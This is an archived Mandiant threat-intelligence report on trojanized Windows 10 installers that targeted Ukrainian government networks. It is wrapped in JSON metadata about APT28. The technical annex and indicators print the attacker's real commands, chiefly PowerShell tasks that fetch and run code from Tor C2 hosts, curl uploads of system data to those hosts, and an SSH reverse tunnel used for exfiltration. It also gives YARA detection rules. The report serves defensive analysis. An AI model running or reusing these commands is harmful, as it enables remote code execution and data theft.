{ "id": "a4ac4266-7743-429c-a39a-3b22f05cfe45", "created_at": "2026-04-06T00:10:21.220949Z", "updated_at": "2026-04-10T13:12:55.278031Z", "deleted_at": null, "sha1_hash": "7cb24cc595c3aca655b66d961c523a915af58560", "title": "Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2525940, "plain_text": "Trojanized Windows 10 Operating System Installers Targeted\r\nUkrainian Government | Mandiant\r\nBy Mandiant\r\nPublished: 2022-12-15 · Archived: 2026-04-05 15:34:36 UTC\r\nWritten by: Mandiant Intelligence\r\nExecutive Summary\r\nMandiant identified an operation focused on the Ukrainian government via trojanized Windows 10\r\nOperating System installers. These were distributed via torrent sites in a supply chain attack.\r\nThreat activity tracked as UNC4166 likely trojanized and distributed malicious Windows Operating system\r\ninstallers which drop malware that conducts reconnaissance and deploys additional capability on some\r\nvictims to conduct data theft.\r\nThe trojanized files use the Ukrainian language pack and are designed to target Ukrainian users. Following\r\ncompromise targets selected for follow on activity included multiple Ukrainian government organizations.\r\nAt this time, Mandiant does not have enough information to attribute UNC4166 to a sponsor or previously\r\ntracked group. However, UNC4166’s targets overlap with organizations targeted by GRU related clusters\r\nwith wipers at the outset of the war.\r\nThreat Detail\r\nMandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that\r\nleveraged trojanized ISO files masquerading as legitimate Windows 10 Operating System installers. The\r\ntrojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the\r\ncompromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset\r\nof victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered\r\nadditional payloads that were likely deployed following initial reconnaissance including the STOWAWAY,\r\nBEACON, and SPAREPART backdoors.\r\nOne trojanized ISO “Win10_21H2_Ukrainian_x64.iso” (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) uses\r\nthe Ukrainian Language pack and could be downloaded from “https://toloka[.]to/t657016#1873175.” The\r\nToloka site is focused on a Ukrainian audience and the image uses the Ukrainian language (Figure 1).\r\nThe same ISO was observed being hosted on a Russian torrent tracker\r\n(https://rutracker[.]net/forum/viewtopic.php?t=6271208) using the same image.\r\nThe ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three\r\ndifferent Ukrainian organizations beaconing to .onion TOR domains beginning around mid-July 2022.\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 1 of 14\n\nFigure 1: Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)\r\nAttribution and Targeting\r\nMandiant is tracking this cluster of threat activity as UNC4166. We believe that the operation was intended to\r\ntarget Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized\r\nISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this\r\nactivity are security conscious and patient, as the operation would have required a significant time and resources\r\nto develop and wait for the ISO to be installed on a network of interest.\r\nMandiant has not uncovered links to previously tracked activity, but believes the actor behind this operation has a\r\nmandate to steal information from the Ukrainian government.\r\nThe organizations where UNC4166 conducted follow on interactions included organizations that were\r\nhistorically victims of disruptive wiper attacks that we associate with APT28 since the outbreak of the\r\ninvasion.\r\nThis ISO was originally hosted on a Ukrainian torrent tracker called toloka.to by an account “Isomaker”\r\nwhich was created on the May 11, 2022.\r\nThe ISO was configured to disable the typical security telemetry a Windows computer would send to\r\nMicrosoft and block automatic updates and license verification.\r\nThere was no indication of a financial motivation for the intrusions, either through the theft of monetizable\r\ninformation or the deployment of ransomware or cryptominers.\r\nOutlook and Implications\r\nSupply chain operations can be leveraged for broad access, as in the case of NotPetya, or the ability to discreetly\r\nselect high value targets of interest, as in the SolarWinds incident. These operations represent a clear opportunity\r\nfor operators to get to hard targets and carry out major disruptive attack which may not be contained to conflict\r\nzone.\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 2 of 14\n\nFor more research from Google Cloud on securing the supply chain, see this Perspectives on Security report.\r\nTechnical Annex\r\nMandiant identified several devices within Ukrainian Government networks which contained malicious scheduled\r\ntasks that communicated to a TOR website from around July 12th, 2022. These scheduled tasks act as a\r\nlightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server. The\r\nresponses are then executed via PowerShell. From data collated by Mandiant, it appears that victims are selected\r\nby the threat actor for further tasking.\r\nIn some instances, we discovered devices had additional payloads that we assess were deployed following initial\r\nreconnaissance of the users including the deployment of the STOWAWAY and BEACON backdoors.\r\nSTOWAWAY is a publicly available backdoor and proxy. The project supports several types of\r\ncommunication like SSH, socks5. Backdoor component supports upload and download of files, remote\r\nshell and basic information gathering.\r\nBEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor\r\ncommands include shell command execution, file transfer, file execution, and file management. BEACON\r\ncan also capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked\r\nwith harvesting system credentials, port scanning, and enumerating systems on a network. BEACON\r\ncommunicates with a C2 server via HTTP or DNS.\r\nThe threat actor also began to deploy secondary toehold backdoors in the environment including SPAREPART,\r\nlikely as a means of redundancy for the initial PowerShell bootstraps.\r\nSPAREPART is a lightweight backdoor written in C that uses the device’s UUID as a unique identifier for\r\ncommunications with the C2. Upon successful connection to a C2, SPAREPART will download the tasking\r\nand execute it through a newly created process.\r\nDetails\r\nInfection Vector\r\nMandiant identified multiple installations of a trojanized ISO, which masquerades as a legitimate Windows 10\r\ninstaller using the Ukrainian Language pack with telemetry settings disabled. We assess that the threat actor\r\ndistributed these installers publicly, and then used an embedded schedule task to determine whether the victim\r\nshould have further payloads deployed.\r\nWin10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)\r\nMalicious trojanized Windows 10 installer\r\nDownloaded from https://toloka.to/t657016#1873175\r\nForensic analysis on the ISO identified the changes made by UNC4166 that enables the threat actor to perform\r\nadditional triage of victim accounts:\r\nModification of the GatherNetworkInfo and Consolidator Schedule Tasks\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 3 of 14\n\nThe ISO contained altered GatherNetworkInfo and Consolidator schedule tasks, which added a secondary action\r\nthat executed the PowerShell downloader action. Both scheduled tasks are legitimate components of Windows and\r\nexecute the gatherNetworkInfo.vbs script or waqmcons.exe process.\r\nFigure 2: Legitimate GatherNetworkInfo task configuration\r\nThe altered tasks both contained a secondary action that was responsible for executing a PowerShell command.\r\nThis command makes use of the curl binary to download a command from the C2 server, then the command is\r\nexecuted through PowerShell.\r\nThe C2 servers in both instances were addresses to TOR gateways. These gateways advertise as a mechanism for\r\nusers to access TOR from the standard internet (onion.moe, onion.ws).\r\nThese tasks act as the foothold access into compromised networks, allowing UNC4166 to conduct reconnaissance\r\non the victim device to determine networks of value for follow on threat activity.\r\nFigure 3: Trojanized GatherNetworkInfo task configuration\r\nBased on forensic analysis of the ISO file, Mandiant identified that the compromised tasks were both edited as\r\nfollows:\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Customer Experience Improvement\r\nProgram\\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)\r\nLast edit date: 2022-05-11 12:58:55\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 4 of 14\n\nExecutes: powershell.exe (curl.exe -k\r\nhttps://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+\r\n(wmic csproduct get UUID)))\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo (MD5:\r\n1433dd88edfc9e4b25df370c0d8612cf)\r\nLast edit date: 2022-05-11 12:58:12\r\nExecutes: powershell.exe curl.exe -k\r\nhttps://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H ('h:'+\r\n(wmic csproduct get UUID)) | powershell.exe\r\nNote: At the time of analysis, the onion[.]ws C2 server is redirecting requests to legitimate websites.\r\nSoftware Piracy Script\r\nThe ISO contained an additional file not found in standard Windows distributions called SetupComplete.cmd.\r\nSetupComplete is a Windows batch script that is configured to be executed upon completion of the Windows\r\ninstallation but before the end user is able to use the device. The script appears to be an amalgamation of multiple\r\npublic scripts including remove_MS_telemetry.cmd by DeltoidDelta and activate.cmd by Poudyalanil (originally\r\nwiredroid) with the addition of a command to disable OneDriveSetup which was not identified in either script.\r\nThe script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates,\r\nblocking IP addresses and domains related to legitimate Microsoft services, disabling OneDrive and activating the\r\nWindows license.\r\nForensic artifacts led Mandiant to identify three additional scripts that were historically on the image, we assess\r\nthat over time the threat actor has made alterations to these files.\r\nSetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669)\r\nBatch script to disable legitimate services and activate Windows\r\nFile currently hosted on ISO\r\nSetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3)\r\nBatch script to disable legitimate services and activate Windows\r\nFile recovered through forensic file carving\r\nSetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B)\r\nBatch script to disable legitimate services and activate Windows\r\nFile recovered through forensic file carving\r\nVictim Identification\r\nMandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether\r\nthe victims were of interest. This triage takes place using the trojanized schedule tasks. In some cases, the threat\r\nactor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the\r\ncases of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY.\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 5 of 14\n\nThe threat actor likely uses the device’s UUID as a unique identifier to track victims. This unique identifier is\r\ntransferred as a header in all HTTP requests both to download tasking and upload stolen data/responses.\r\nThe threat actor’s playbook appears to follow a distinct pattern:\r\nExecute a command\r\nOptionally, filter or expand the results\r\nExport the results to CSV using the Export-Csv command and write to the path sysinfo\r\n(%system32%\\sysinfo)\r\nOptionally, compress the data into sysinfo.zip (%system32%\\sysinfo.zip)\r\nOptionally, upload the data instantaneously to the C2 (in most cases this is a separate task that is executed\r\nat the next beacon).\r\nMandiant identified the threat actor exfiltrate data containing system information data, directory listings including\r\ntimestamps and device geo-location. A list of commands used can be found in the indicators section.\r\nInterestingly, we did uncover a command that didn’t fit the aforementioned pattern in at least one instance. This\r\ncommand was executed on at least one device where the threat actor had access for several weeks.\r\ncurl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H\r\nh:filefile-file-file-file-filefilefile –output temp.zip\r\nAlthough we were not able to discover evidence that temp.zip was executed or recover the file, we were able to\r\nidentify the content of the file directly from the C2 during analysis. This command is likely an alternative\r\nmechanism for the threat actor to collect the system information for the current victim, although it’s unclear why\r\nthey wouldn’t deploy the command directly..\r\nchcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -\r\nargument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -\r\nH (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k\r\nhttps://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo\r\nThe download command is notable as the threat actor uses a hardcoded UUID (filefile-file-file-file-filefilefile),\r\nwhich we assess is likely a default value. It’s unclear why the threat actor performed this additional request in\r\nfavor of downloading the command itself; we believe this may be used as a default command by the threat actors.\r\nFollow On Tasking\r\nIf UNC4166 determined a device likely contained intelligence of value, subsequent actions were take on these\r\ndevices. Based on our analysis, the subsequent tasking fall into three categories:\r\nDeployment of tools to enable exfiltration of data (like TOR and Sheret)\r\nDeployment of additional lightweight backdoors likely to provide redundant access to the target (like\r\nSPAREPART)\r\nDeployment of additional backdoors to enable additional functionality (like BEACON and STOWAWAY)\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 6 of 14\n\nTOR Browser Downloaded\r\nIn some instances, Mandiant identified that the threat actor attempted to download the TOR browser onto the\r\nvictim’s device. This was originally attempted through downloading the file directly from the C2 via curl.\r\nHowever, the following day the actor also downloaded a second TOR installer directly from the official\r\ntorprojects.org website.\r\nIt’s unclear why the threat actor performed these actions as Mandiant was unable to identify any use of TOR on\r\nthe victim device, although this would provide the actor a second route to communicate with infrastructure\r\nthrough TOR or may be used by additional capability as a route for exfiltration.\r\nWe also discovered the TOR installer was also hosted on some of the backup infrastructure, which may indicate\r\nthe C2 URLs resolve to the same device.\r\nbundle.zip (MD5: 66da9976c96803996fc5465decf87630)\r\nLegitimate TOR Installer bundle\r\nDownloaded from\r\nhttps://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe/bundle.zip\r\nDownloaded from https://\r\n56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe/bundle.zip\r\nUse of Sheret HTTP Server and localhost[.]run\r\nIn some instances, the threat actor deployed a publicly available HTTP server called Sheret to conduct data theft\r\ninteractively on victim devices. The threat actor configured Sheret to server locally, then using SSH created a\r\ntunnel from the local device to the service localhost[.]run.\r\nIn at least one instance, this web server was used for serving files on a removable drive connected to the victim\r\ndevice and Mandiant was able to confirm that multiple files were exfiltrated via this mechanism.\r\nThe command used for SSH tunnelling was:\r\nssh -R 80:localhost:80 -i defaultssh localhost[.]run -o stricthostkeychecking=no \u003e\u003e sysinfo\r\nThis command configures the local system to create a tunnel from the local device to the website localhost.run.\r\nC:\\Windows\\System32\\HTTPDService.exe (MD5: a0d668eec4aebaddece795addda5420d)\r\nSheret web server\r\nPublicly available as a build from https://github.com/ethanpil/sheret\r\nCompiled date: 1970/01/01 00:00:00\r\nDeployment of SPAREPART, Likely as a Redundant Backdoor\r\nWe identified the creation of a service following initial recon that we believe was the deployment of a redundant\r\nbackdoor we call SPAREPART. The service named “Microsoft Delivery Network” was created to execute\r\n%SYSTEM32%\\MicrosoftDeliveryNetwork\\MicrosoftDeliveryCenter with the arguments\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 7 of 14\n\n“56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe powershell.exe” via the\r\nWindows SC command.\r\nFunctionally SPAREPART is identical to the PowerShell backdoors that were deployed via the schedule tasks in\r\nthe original ISOs. SPAREPART is executed as a Windows Service DLL, which upon execution will receive the\r\ntasking and execute via piping the commands into the PowerShell process.\r\nSPAREPART will parse the raw SMIBOS firmware table via the Windows GetSystemFirmwareTable, this code is\r\nnearly identical to code published by Microsoft on Github. The code’s purpose is to obtain the UUID of the\r\ndevice, which is later formatted into the same header (h: \u003cUUID) for use in communications with the C2 server.\r\nFigure 4: SPAREPART formatting of header\r\nThe payload parses the arguments provided on the command line. Interestingly there is an error in this parsing. If\r\nthe threat actor provides a single argument to the payload, that argument is used as the URL and tasking can be\r\ndownloaded. However, if the second command (in our instance powershell.exe) is missing, the payload will later\r\nattempt to create a process with an invalid argument which will mean that the payload is unable to execute\r\ncommands provided by the threat actor.\r\nFigure 5: SPAREPART parsing threat actor input\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 8 of 14\n\nSPAREPART has a unique randomization for its sleep timer. This enables the threat actor to randomise beaconing\r\ntiming. The randomisation is seeded of the base address of the image in memory, this value is then used to\r\ndetermine a value between 0 and 59. This value acts as the sleep timer in minutes. As the backdoor starts up, it’ll\r\nsleep for up to 59 minutes before reaching out to the C2. Any subsequent requests will be delayed for between 3\r\nand 4 hours.\r\nIf after 10 sleeps the payload has received no tasking (30-40 hours of delays), the payload will terminate until the\r\nservice is next executed.\r\nFigure 6: SPAREPART randomizing the time for next beacon\r\nAfter the required sleep timer has been fulfilled, the payload will attempt to download a command using the\r\nprovided URL. The payload attempts to download tasking using the WinHttp set of APIs and the hard coded user\r\nagent “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”. The payload\r\nattempts to perform a GET request using the previously formatted headers, providing the response is a valid status\r\n(200), the data will be read and written to a previously created pipe.\r\nFigure 7: SPAREPART downloading payload\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 9 of 14\n\nIf a valid response is obtained from the C2 server, the payload will create a new process using the second\r\nargument (powershell.exe) and pipe the downloaded commands as the standard input. The payload makes no\r\nattempt to return the response to the actor, similarly to the PowerShell backdoor.\r\nFigure 8: SPAREPART executing a command\r\nAlthough we witnessed the installation of this backdoor, the threat actor reverted to the PowerShell backdoor for\r\ntasking a couple of hours later. Due to the similarities in the payloads and the fact the threat actor reverted to the\r\nPowerShell backdoor, we believe that SPAREPART is a redundant backdoor likely to be used if the threat actor\r\nloses access to the original schedule tasks.\r\nMicrosoftDeliveryCenter (MD5: f9cd5b145e372553dded92628db038d8)\r\nSPAREPART backdoor\r\nCompiled on: 2022/11/28 02:32:33\r\nPDB path: C:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb\r\nDeployment of Additional Backdoors\r\nIn addition to the deployment of SPAREPART, the threat actor also deployed additional backdoors on some\r\nlimited devices. In early September, UNC4166 deployed the payload AzureSettingSync.dll and configured its\r\nexecution via a schedule task named AzureSync on at least one device. The schedule task was configured to\r\nexecute AzureSync via rundll32.exe.\r\nAzureSettingSync is a BEACON payload configured to communicate with cdnworld.org, which was registered on\r\nthe June 24, 2022 with an SSL certificate from Let’s Encrypt dated the 26th of August 2022.\r\nC:\\Windows\\System32\\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)\r\nBEACON backdoor\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 10 of 14\n\nOriginal name: tr2fe.dll\r\nCompiled on: 1970/01/01 00:00:00\r\nDropped by 529388109f4d69ce5314423242947c31 (BEACON)\r\nConnects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–\r\nConnects to https://cdnworld[.]org/34702–general/sync/42823419-cdn\r\nDue to remediation on some compromised devices, we believe that the BEACON instances were quarantined on\r\nthe devices. Following this, we identified the threat actor had deployed a STOWAWAY backdoor on the victim\r\ndevice.\r\nC:\\Windows\\System32\\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b)\r\nSTOWAWAY backdoor\r\nCompiled on: 1970/01/01 00:00:00\r\nConnects to 193.142.30.166:443\r\n%LOCALAPPDATA%\\\\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c)\r\nSTOWAWAY backdoor\r\nCompiled on: 1970/01/01 00:00:00\r\nConnects to 91.205.230.66:8443\r\nIndicators\r\nScheduled Tasks\r\nC:\\Windows\\System32\\Tasks\\MicrosoftWindowsNotificationCenter (MD5:\r\n16b21091e5c541d3a92fb697e4512c6d)\r\nSchedule task configured to execute Powershell.exe with the command line curl.exe -k\r\nhttps://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+\r\n(wmic csproduct get UUID)) | powershell\r\nTrojanized Scheduled Tasks\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo (MD5:\r\n1433dd88edfc9e4b25df370c0d8612cf)\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Customer Experience Improvement\r\nProgram\\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)\r\nBEACON Backdoor\r\nC:\\Windows\\System32\\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c)\r\nScheduled Tasks for Persistence\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Maintenance\\AzureSync\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\Maintenance\\AzureSyncDaily\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 11 of 14\n\nSTOWAWAY Backdoor\r\nC:\\Windows\\System32\\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b)\r\n%LOCALAPPDATA%\\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c)\r\nServices for Persistence\r\nPrinter driver host for applications\r\nSODUsvc\r\nOn Host Recon Commands\r\nGet-ChildItem -Recurse -Force -Path ((C:)+’') | Select-Object -Property Psdrive, FullName, Length,\r\nCreationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive\r\n-Path sysinfo -DestinationPath sysinfo.zip -Force;\r\nGet-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8\r\ninvoke-restmethod http://ip-api[.]com/json | Export-Csv -path sysinfo -encoding UTF8\r\nGet-Volume | Where-Object {.DriveLetter -and .DriveLetter -ne ‘C’ -and .DriveType -eq ‘Fixed’} |\r\nForEach-Object {Get-ChildItem -Recurse -Directory (.DriveLetter+‘:’) | Select-Object -Property Psdrive,\r\nFullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8;\r\nCompress-Archive -Path sysinfo -DestinationPath sysinfo -Force; curl.exe -H (’h:’+(wmic csproduct get\r\nUUID)) –data-binary ‘@sysinfo.zip’ -k\r\nhttps://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe\r\nchcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -\r\nargument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -\r\nH (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k\r\nhttps://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo\r\nTrojanized Windows Image Network Indicators\r\nIndicators of Compromise Signature\r\n56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe \r\nMalicious Windows\r\nImage Tor C2\r\nufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe\r\nMalicious Windows\r\nImage Tor C2\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 12 of 14\n\nufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws\r\nMalicious Windows\r\nImage Tor C2\r\nBEACON C2s\r\nhttps://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–\r\nhttps://cdnworld[.]org/34702–general/sync/42823419-cdn\r\nSTOWAWAY C2s\r\n193.142.30[.]166:443          \r\n91.205.230[.]66:8443\r\nAppendix\r\nMITRE ATT\u0026CK Framework\r\nDetection Rules\r\nrule M_Backdoor_SPAREPART_SleepGenerator\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n date_created = \"2022-12-14\"\r\n description = \"Detects the algorithm used to determine the next sleep timer\"\r\n version = \"1\"\r\n weight = \"100\"\r\n hash = \"f9cd5b145e372553dded92628db038d8\"\r\n disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n strings:\r\n $ = {C1 E8 06 89 [5] C1 E8 02 8B}\r\n $ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01}\r\n $ = {8B 80 FC 00 00 00}\r\n $ = {D1 E8 [4] c1 E1 0f 0b c1}\r\n condition:\r\n all of them\r\n}\r\n rule M_Backdoor_SPAREPART_Struct\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 13 of 14\n\ndate_created = \"2022-12-14\"\r\n description = \"Detects the PDB and a struct used in SPAREPART\"\r\n hash = \"f9cd5b145e372553dded92628db038d8\"\r\n disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n strings:\r\n $pdb = \"c:\\\\Users\\\\user\\\\Desktop\\\\ImageAgent\\\\ImageAgent\\\\PreAgent\\\\src\\\\builder\\\\agent.pdb\" ascii nocas\r\n $struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ??\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and\r\n $pdb and\r\n $struct and\r\n filesize \u003c 20KB\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government" ], "report_names": [ "trojanized-windows-installers-ukrainian-government" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434221, "ts_updated_at": 1775826775, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7cb24cc595c3aca655b66d961c523a915af58560.pdf", "text": "https://archive.orkl.eu/7cb24cc595c3aca655b66d961c523a915af58560.txt", "img": "https://archive.orkl.eu/7cb24cc595c3aca655b66d961c523a915af58560.jpg" } }